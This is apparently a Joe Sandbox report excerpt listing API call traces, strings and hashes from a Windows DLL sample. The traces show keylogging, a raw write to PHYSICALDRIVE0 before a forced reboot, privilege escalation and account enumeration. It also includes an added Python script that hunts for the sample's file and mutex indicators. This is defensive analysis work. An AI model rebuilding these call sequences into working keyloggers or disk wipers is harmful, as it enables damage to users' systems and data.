                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1001DB4F
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                            • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                          • GetFileAttributesA.KERNEL32(?), ref: 1001DB83
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001DB99
                                                          • wsprintfA.USER32 ref: 1001DBC0
                                                          • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001DBD5
                                                          • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001DBE1
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBEF
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBF6
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DC3A
                                                          • GetTickCount.KERNEL32 ref: 1001DC40
                                                          • GetTickCount.KERNEL32 ref: 1001DC67
                                                          • GetTickCount.KERNEL32 ref: 1001DCAC
                                                          • GetTickCount.KERNEL32 ref: 1001DCF0
                                                          • GetTickCount.KERNEL32 ref: 1001DD0E
                                                          • Sleep.KERNEL32(00000064,?,00000001), ref: 1001DD2A
                                                          • GetTickCount.KERNEL32 ref: 1001DD46
                                                          • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD54
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD69
                                                          • #825.MFC42(?), ref: 1001DE12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountTick$Create$Sleep$CloseD@2@@std@@D@std@@FileHandleMutexU?$char_traits@V?$allocator@strrchr$#825AttributesDirectoryEos@?$basic_string@ErrorEventGrow@?$basic_string@LastModuleNameObjectReleaseSingleStartupThreadWaitisdigitmemmovesprintfsrandtimewsprintf
                                                          • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive$MyService$e
                                                          • API String ID: 4188121392-1841343700
                                                          • Opcode ID: f32a2ccd1ab71fbf8ef5ddea4480b4d3ab1966c981617cd67936b966bb15a630
                                                          • Instruction ID: 559cf9057b97644e8b87333c0e59f2f7267fda61bbf3804e65adc10e60db3a1c
                                                          • Opcode Fuzzy Hash: f32a2ccd1ab71fbf8ef5ddea4480b4d3ab1966c981617cd67936b966bb15a630
                                                          • Instruction Fuzzy Hash: 66A1E5751083419BE320FF68CC85BABB7E4EF95744F04091DF9898B291DB75E988C762
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event
                                                          • String ID: /*/$C:\ProgramData\Microsoft Drive\De.ini$Loop stopped as 1.txt does not exist.$Received command to stop loop. De.ini deleted.$jieshuxunhuan
                                                          • API String ID: 4201588131-4242312597
                                                          • Opcode ID: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                          • Instruction ID: 368dbf102333d3f33aab7b414df493a5988d33fb55c3cd96ca69a7f772dd8b24
                                                          • Opcode Fuzzy Hash: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                          • Instruction Fuzzy Hash: 2771F7B5604209AFF340DF389C81D9F77DCEF95295F040629F98E93246EB21F94897A2
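The String ID lines of the records above name the on-host artefacts this sample touches: C:\ProgramData\jerrt.txt read before the host-information beacon, the working directories C:\ProgramData\Microsoft Drive and C:\ProgramData\Microsoft Drive1 created with CreateDirectoryA, the per-instance C:\ProgramData\%d.ini template, the loop-control file C:\ProgramData\Microsoft Drive\De.ini, and the mutex strings MyService and MyService1 next to CreateMutexA. The following Python is an added hunting example for this page, not code from the sample, from Joe Sandbox or from any EDR product: it runs those indicators over constructed telemetry lines in a simple "Kind Key=Value" form. The telemetry, the line format and the descriptive notes are this example's own; because a wsprintfA call sits immediately before each CreateMutexA, MyService/MyService1 are assumed to be components of the mutex name rather than necessarily the whole name, so they are matched as substrings.

```python
"""Hunt constructed endpoint telemetry for the file-system and mutex
artefacts named in the String ID lines of the records above.  Added
example for this page; not code from the sample or from Joe Sandbox.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Paths taken verbatim from the String ID lines; compared case-insensitively
# and without a trailing backslash, as NTFS would.  The notes are this
# example's reading of the API sequence in each record, not report labels.
FILE_INDICATORS = {
    r"C:\ProgramData\jerrt.txt": "read via CreateFileA/ReadFile before the host-info beacon",
    r"C:\ProgramData\Microsoft Drive": "CreateDirectoryA working directory (MyService variant)",
    r"C:\ProgramData\Microsoft Drive1": "CreateDirectoryA working directory (MyService1 variant)",
    r"C:\ProgramData\Microsoft Drive\De.ini": "loop-control file, deleted on the stop command",
}
# "C:\ProgramData\%d.ini" is a wsprintfA template, so any purely numeric
# .ini name directly under ProgramData counts as a match.
NUMERIC_INI = re.compile(r"^C:\\ProgramData\\\d+\.ini$", re.IGNORECASE)
# Assumption: wsprintfA precedes CreateMutexA in both records, so the literal
# may only be part of the final name; substring match, longer indicator first.
MUTEX_INDICATORS = ("MyService1", "MyService")

LINE = re.compile(r"^(?P<kind>\w+)\s+(?P<key>\w+)=(?P<value>.*)$")


@dataclass(frozen=True)
class Hit:
    kind: str       # telemetry event kind the match came from
    value: str      # raw value as seen in telemetry
    indicator: str  # indicator string from the report that matched
    note: str


def _norm_path(p: str) -> str:
    return p.strip().rstrip("\\").lower()


def hunt(log_text: str) -> list[Hit]:
    """Parse 'Kind Key=Value' lines and return every indicator match."""
    hits: list[Hit] = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip malformed lines rather than abort the hunt
        kind, value = m["kind"], m["value"]
        if kind == "FileCreate":
            norm = _norm_path(value)
            for ind, note in FILE_INDICATORS.items():
                if norm == _norm_path(ind):
                    hits.append(Hit(kind, value, ind, note))
            if NUMERIC_INI.match(value.strip()):
                hits.append(Hit(kind, value, r"C:\ProgramData\%d.ini",
                                "per-instance ini written from the wsprintfA template"))
        elif kind == "MutexCreate":
            name = value.rsplit("\\", 1)[-1]  # drop \Sessions\..\BaseNamedObjects\
            for ind in MUTEX_INDICATORS:
                if ind in name:
                    hits.append(Hit(kind, value, ind, "CreateMutexA single-instance check"))
                    break
    return hits


def summarize(log_text: str) -> list[str]:
    """Matched indicator strings in telemetry order, for a quick triage view."""
    return [h.indicator for h in hunt(log_text)]


# Constructed sample telemetry (not from the report).
SAMPLE_LOG = """\
FileCreate TargetFilename=C:\\ProgramData\\Microsoft Drive1\\
FileCreate TargetFilename=C:\\ProgramData\\4212.ini
FileCreate TargetFilename=c:\\programdata\\microsoft drive\\De.ini
FileCreate TargetFilename=C:\\Users\\Public\\notes.ini
MutexCreate Name=\\Sessions\\1\\BaseNamedObjects\\MyService1
MutexCreate Name=\\BaseNamedObjects\\Global\\UnrelatedMutex
garbage line that does not parse
"""


if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(f"{h.kind:12} {h.indicator:42} {h.note}")
```

The numeric-ini pattern is the loosest of the set and will also match legitimate software that drops files such as C:\ProgramData\1.ini, so on real telemetry it is best used only to corroborate one of the exact-path or mutex hits from the same host and process.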
                                                          APIs
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                          • ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                          • ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                          • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                          • FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • _strcmpi.MSVCRT ref: 1000BE80
                                                          • _strcmpi.MSVCRT ref: 1000BE97
                                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BEB3
                                                          • #825.MFC42(?), ref: 1000BF08
                                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BF2D
                                                          • DeleteFileA.KERNEL32(?), ref: 1000BF42
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 1000BF7B
                                                          • FindClose.KERNEL32(00000000), ref: 1000BF8A
                                                          • RemoveDirectoryA.KERNEL32(?), ref: 1000BF98
                                                          • #825.MFC42(?), ref: 1000BFBA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$D@2@@0@FileFindHstd@@Tidy@?$basic_string@V10@V?$basic_string@$#825_strcmpi$?append@?$basic_string@CloseDeleteDirectoryEos@?$basic_string@FirstFreeze@?$basic_string@Grow@?$basic_string@NextRemoveV12@Xran@std@@
                                                          • String ID: *.*
                                                          • API String ID: 2724700886-438819550
                                                          • Opcode ID: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                          • Instruction ID: 3864407029e8fe6deab90730e0e99c0bea179ee7459791ed1101209935cd539f
                                                          • Opcode Fuzzy Hash: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                          • Instruction Fuzzy Hash: F371E2754087859FE710DF24CC94AEEBBE4FB84380F444A2DF985872A5DB31A909CF52
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 10002357
                                                          • PostQuitMessage.USER32(00000000), ref: 10002387
                                                          • SetWindowLongA.USER32(?,000000EB,?), ref: 100023A9
                                                          • GetModuleHandleA.KERNEL32(00000000,00000066), ref: 100023B3
                                                          • LoadIconA.USER32(00000000), ref: 100023BA
                                                          • SetClassLongA.USER32(?,000000F2,00000000), ref: 100023C4
                                                          • DestroyWindow.USER32(?), ref: 100023EA
                                                          Strings
                                                          • %s %d/%d/%d %d:%02d:%02d %s, xrefs: 10002513
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongWindow$ClassDestroyHandleIconLoadMessageModulePostQuit
                                                          • String ID: %s %d/%d/%d %d:%02d:%02d %s
                                                          • API String ID: 3894596752-2160474225
                                                          • Opcode ID: 1904ecbfdee7d611a030658981fe37c0d0122d5446e29a64de195553bc9f444d
                                                          • Instruction ID: 439356ab79706b28f2f9ca069669659c2d6bf2d32ef7ce3fd9937e9eb7b6a6bc
                                                          • Opcode Fuzzy Hash: 1904ecbfdee7d611a030658981fe37c0d0122d5446e29a64de195553bc9f444d
                                                          • Instruction Fuzzy Hash: CE5122765046166FF321CB28CCC5FEB77ACFF48351F084635FA4AD21C2CA6DA9098661
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                          • lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
                                                          • strstr.MSVCRT ref: 1002AC63
                                                          • GetPrivateProfileStringA.KERNEL32(InternetShortcut,URL,1012B044,?,00000104,?), ref: 1002ACB3
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002ACBD
                                                          • lstrlenA.KERNEL32(?), ref: 1002ACC6
                                                          • LocalSize.KERNEL32(?), ref: 1002ACDC
                                                          • LocalReAlloc.KERNEL32(?,-00000400,00000042), ref: 1002ACF5
                                                          • lstrlenA.KERNEL32(?), ref: 1002AD05
                                                          • lstrlenA.KERNEL32(?), ref: 1002AD2F
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002AD49
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002AD79
                                                          • FindNextFileA.KERNEL32(?,?), ref: 1002AD95
                                                          • FindClose.KERNEL32(?), ref: 1002ADA4
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Find$FileLocallstrcat$AllocCloseFirstNextPrivateProfileSizeStringstrstr
                                                          • String ID: .$.url$InternetShortcut$URL$\*.*
                                                          • API String ID: 3365753205-65308377
                                                          • Opcode ID: 23a19cf4749a79bd38d03e3b07e7f2be74737afd946fab1e6ba4d09cd67840df
                                                          • Instruction ID: 01225bb2abe30c27f4baf0a4e6b0b3de23dc1d41b29693e4ad67a7c63e454342
                                                          • Opcode Fuzzy Hash: 23a19cf4749a79bd38d03e3b07e7f2be74737afd946fab1e6ba4d09cd67840df
                                                          • Instruction Fuzzy Hash: 806105352046449FC729CB28CC85AEBB7E6FBC4305F544B1DFA4AA3291DF78A90AC741
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,?,00000000,00000065), ref: 100092C6
                                                          • wsprintfA.USER32 ref: 1000931C
                                                          • FindFirstFileA.KERNEL32(?,?,100FA614,?,00000000,00000065), ref: 1000932E
                                                          • wsprintfA.USER32 ref: 10009390
                                                          • wsprintfA.USER32 ref: 100093BC
                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 100093D6
                                                          • DeleteFileA.KERNEL32(?), ref: 100093E4
                                                          • FindNextFileA.KERNEL32(?,?), ref: 100093F4
                                                          • FindClose.KERNEL32(?), ref: 10009407
                                                          • RemoveDirectoryA.KERNEL32(?), ref: 1000940E
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Findwsprintf$AttributesCloseDeleteDirectoryFirstNextRemovelstrlen
                                                          • String ID: %$%$%$%$%$.$.
                                                          • API String ID: 1639472542-2249276185
                                                          • Opcode ID: 5b6e6152956aa3aa1583c1ec0d93a6a96c4927921946a9250eb426886467527d
                                                          • Instruction ID: 8a00a536bbcf0f339130e2cb173a01ba14998b4175500a8bb64526298c27287d
                                                          • Opcode Fuzzy Hash: 5b6e6152956aa3aa1583c1ec0d93a6a96c4927921946a9250eb426886467527d
                                                          • Instruction Fuzzy Hash: EF417F7100D3C19AE711CB64DC48AEBBBE8EBD6344F084A5DF5C893281D6799608C76B
                                                          APIs
                                                          • FindWindowA.USER32(?,00000000), ref: 1001A481
                                                          • GetWindowTextA.USER32(00000000,771B32F0,00000104), ref: 1001A4DC
                                                          • GetWindow.USER32(00000000,00000002), ref: 1001A586
                                                          • GetClassNameA.USER32(00000000,771B32F0,00000104), ref: 1001A595
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001A5A4
                                                          • wsprintfA.USER32 ref: 1001A619
                                                          • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\Destop.ini,?,00000001), ref: 1001A6C7
                                                          • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\De.ini,?,00000001), ref: 1001A73B
                                                          • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\id.ini,?,00000001), ref: 1001A774
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFileWindow$ClassCloseFindHandleNameTextwsprintf
                                                          • String ID: %s $C:\ProgramData\Microsoft Drive\De.ini$C:\ProgramData\Microsoft Drive\Destop.ini$C:\ProgramData\Microsoft Drive\id.ini$CTXOPConntion_Class$qq.exe
                                                          • API String ID: 2156150844-4244366814
                                                          • Opcode ID: 2fab3d79b7c153194fb415c13bdb1816867f672efe220bb48b777d481ba05164
                                                          • Instruction ID: 6e49010710ea7cfde4e70a8d4c07c6d928d78a403e4cb6ea405f1795ec133dc1
                                                          • Opcode Fuzzy Hash: 2fab3d79b7c153194fb415c13bdb1816867f672efe220bb48b777d481ba05164
                                                          • Instruction Fuzzy Hash: EC910836614A080BC72CC57858656AB76C3EBC5370FA9473DFA6BDB2D1DEB8CD498240
                                                          APIs
                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 10008E7D
                                                          • GetUserNameA.ADVAPI32(?,?), ref: 10008EA9
                                                          • _strcmpi.MSVCRT ref: 10008EBC
                                                          • SHGetFolderPathA.SHELL32(00000000,00000010,00000000,00000000,?), ref: 10008EE7
                                                          • CloseHandle.KERNEL32(00000000), ref: 10008EEE
                                                          • lstrlenA.KERNEL32(?), ref: 10008F02
                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 10008F3D
                                                          • SHGetFileInfoA.SHELL32(?,00000080,?,00000160,00000410), ref: 10008F5B
                                                          • lstrlenA.KERNEL32(?), ref: 10008F69
                                                          • lstrlenA.KERNEL32(?), ref: 10008F77
                                                          • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008F96
                                                          • GetDriveTypeA.KERNEL32(?), ref: 10008FDD
                                                          • lstrlenA.KERNEL32(?), ref: 10009047
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Drive$CloseDiskFileFolderFreeHandleInfoInformationLogicalNamePathSpaceStringsTypeUserVolume_strcmpi
                                                          • String ID: SYSTEM$g
                                                          • API String ID: 545482129-3120117691
                                                          • Opcode ID: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                          • Instruction ID: c8429926c63601f6ea7d8031317dae8df0805160766070a83ab6d3e18fb45688
                                                          • Opcode Fuzzy Hash: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                          • Instruction Fuzzy Hash: 6B5180715083499FD710DF24C880AEBBBE9FBC8344F444A2DFA8997251D770AA09CB66
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 10025511
                                                          • wcstombs.MSVCRT ref: 10025552
                                                          • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002556E
                                                          • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002558A
                                                          • LocalAlloc.KERNEL32(00000040,00000400,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 100255AB
                                                          • lstrlenA.KERNEL32(1012C810), ref: 1002561B
                                                          • lstrlenA.KERNEL32(1012C810), ref: 1002563C
                                                          • lstrlenA.KERNEL32(?), ref: 1002564F
                                                          • lstrlenA.KERNEL32(?), ref: 10025671
                                                          • lstrlenA.KERNEL32(?), ref: 10025684
                                                          • lstrlenA.KERNEL32(?), ref: 100256A2
                                                          • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 100256D6
                                                            • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                            • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                            • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$AllocBufferFreeLocalProcessToken$AdjustCloseCurrentEnumErrorHandleLastLookupOpenPrivilegePrivilegesUserValuewcstombs
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2919970077-2896544425
                                                          • Opcode ID: 57ba478f972288fdc5cd98b659e85f394b7f9fefe69c57ff74ae41dcb225ed5b
                                                          • Instruction ID: 6354d9cbaf3505665796eca170beba6c0c811d8fb8498e00f335d9833f977874
                                                          • Opcode Fuzzy Hash: 57ba478f972288fdc5cd98b659e85f394b7f9fefe69c57ff74ae41dcb225ed5b
                                                          • Instruction Fuzzy Hash: EA51D2716047159BC304DF18DC819AFB7E5FBC8700F84491DF686A7241DB75E90ACBA6
                                                          APIs
                                                          • Sleep.KERNEL32(0000000A), ref: 1000B8A6
                                                          • lstrlenA.KERNEL32(?), ref: 1000B8B1
                                                          • GetKeyState.USER32(00000010), ref: 1000B8FB
                                                          • GetAsyncKeyState.USER32(0000000D), ref: 1000B907
                                                          • GetKeyState.USER32(00000014), ref: 1000B914
                                                          • GetKeyState.USER32(00000014), ref: 1000B93C
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$AsyncSleeplstrlen
                                                          • String ID: <BackSpace>$<Enter>
                                                          • API String ID: 43598291-3792472884
                                                          • Opcode ID: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                          • Instruction ID: 254073e1c1d6b0a9fa3052202c61483a4731d11cdb8d0cac1f822bb488184c88
                                                          • Opcode Fuzzy Hash: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                          • Instruction Fuzzy Hash: C3510471508B86ABF710DF64CC847AF73E9EB82384F010E2DEA5192194DB35D949C753
                                                          APIs
                                                          • CreateFileA.KERNEL32 ref: 1000E6D2
                                                          • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E705
                                                          • WriteFile.KERNEL32(00000000,00000000,00000200,00000000,00000000), ref: 1000E719
                                                          • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E734
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000E737
                                                          • Sleep.KERNEL32(000007D0), ref: 1000E742
                                                          • GetVersion.KERNEL32 ref: 1000E748
                                                          • ExitWindowsEx.USER32(00000006,00000000), ref: 1000E768
                                                          • ExitProcess.KERNEL32 ref: 1000E770
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$ControlDeviceExitFile$CloseCreateCurrentHandleOpenSleepTokenVersionWindowsWrite
                                                          • String ID: SeShutdownPrivilege$U$\\.\PHYSICALDRIVE0
                                                          • API String ID: 554375110-3993181469
                                                          • Opcode ID: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                          • Instruction ID: f74105865133530c9c42a2179fda12015e9b4dafff81d6fb0ebd67d8a36456bb
